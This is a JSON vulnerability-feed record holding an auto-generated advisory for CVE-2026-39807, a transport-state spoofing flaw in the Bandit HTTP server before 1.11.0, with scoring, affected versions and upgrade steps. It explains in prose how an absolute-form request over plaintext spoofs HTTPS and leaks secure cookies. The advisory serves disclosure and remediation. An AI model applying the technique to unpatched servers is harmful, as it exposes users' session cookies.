{"uuid": "c63ec3e8-88a2-48a8-be30-755655cc458c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-39807", "type": "seen", "source": "https://gist.github.com/alon710/4ff6ed1a1dcb2ad425666d3faacd2bcb", "content": "# CVE-2026-39807: CVE-2026-39807: Transport-State Spoofing via Untrusted URI Scheme in Bandit HTTP Server\n\n> **CVSS Score:** 6.3\n> **Published:** 2026-05-07\n> **Full Report:** https://cvereports.com/reports/CVE-2026-39807\n\n## Summary\nThe Bandit HTTP server prior to version 1.11.0 contains a transport-state spoofing vulnerability. The application incorrectly prioritizes the client-supplied URI scheme over the verified transport-layer encryption status. This allows unauthenticated attackers to spoof the connection state as secure (HTTPS) over a plaintext connection, bypassing security middleware and exposing secure cookies.\n\n## TL;DR\nA logic flaw in the Bandit HTTP server allows attackers to forge the connection scheme. Sending an absolute-form HTTP request over a plaintext connection causes the server to treat the request as HTTPS, bypassing SSL redirects and leaking secure cookies.\n\n## Exploit Status: POC\n\n## Technical Details\n\n- **CWE ID**: CWE-807\n- **Attack Vector**: Network\n- **CVSS Score**: 6.3\n- **EPSS Score**: 0.00018\n- **Impact**: Security feature bypass and confidentiality loss\n- **Exploit Status**: Proof of Concept\n- **KEV Status**: Not Listed\n\n## Affected Systems\n\n- Bandit HTTP Server for Elixir\n- Elixir applications utilizing Plug.Conn via Bandit\n- Deployments exposing plaintext (non-TLS) HTTP ports\n- **bandit**: >= 1.0.0, < 1.11.0 (Fixed in: `1.11.0`)\n\n## Mitigation\n\n- Upgrade the bandit package to a patched version\n- Disable plaintext network listeners and enforce TLS termination at the application\n- Deploy a reverse proxy to sanitize absolute-form HTTP request targets\n\n**Remediation Steps:**\n1. Update the project's mix.exs file to require bandit version 1.11.0 or later.\n2. Execute `mix deps.get` and `mix compile` to pull and build the updated dependency.\n3. Audit production deployments to verify whether plaintext ports are unintentionally exposed.\n4. Test downstream application behavior to ensure secure cookies and Plug.SSL correctly evaluate the patched state.\n\n## References\n\n- [GitHub Security Advisory GHSA-375f-4r2h-f99j](https://github.com/mtrudel/bandit/security/advisories/GHSA-375f-4r2h-f99j)\n- [EEF CNA Advisory for CVE-2026-39807](https://cna.erlef.org/cves/CVE-2026-39807.html)\n- [Bandit Fix Commit 45feea20](https://github.com/mtrudel/bandit/commit/45feea20dea8af7ffd7245271107b695c040e667)\n- [OSV Record EEF-CVE-2026-39807](https://osv.dev/vulnerability/EEF-CVE-2026-39807)\n\n\n---\n*Generated by [CVEReports](https://cvereports.com/reports/CVE-2026-39807) - Automated Vulnerability Intelligence*", "creation_timestamp": "2026-05-07T04:40:29.000000Z"}